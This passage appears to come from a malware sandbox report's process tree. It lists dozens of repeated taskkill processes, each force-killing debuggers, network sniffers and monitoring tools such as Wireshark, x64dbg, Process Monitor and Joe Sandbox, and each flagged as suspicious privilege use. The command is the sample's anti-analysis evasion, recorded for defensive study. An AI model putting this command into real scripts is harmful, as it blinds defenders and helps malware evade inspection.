        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4640
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3584
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:560
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4308
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4636
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1300
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4684
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1104
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1168
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2624
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3228
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2176
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3604
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1880
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4700
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2080
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1212
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4736
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3788
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3716
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4508
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3332
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:520
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1140
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2728
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        
        PID:3732
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        
        PID:2356
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        
        PID:1328
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        
        PID:1636
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        
        PID:4964
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        
        PID:2288
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        
        PID:3608
      - C:\Windows\system32\taskkill.exe
        
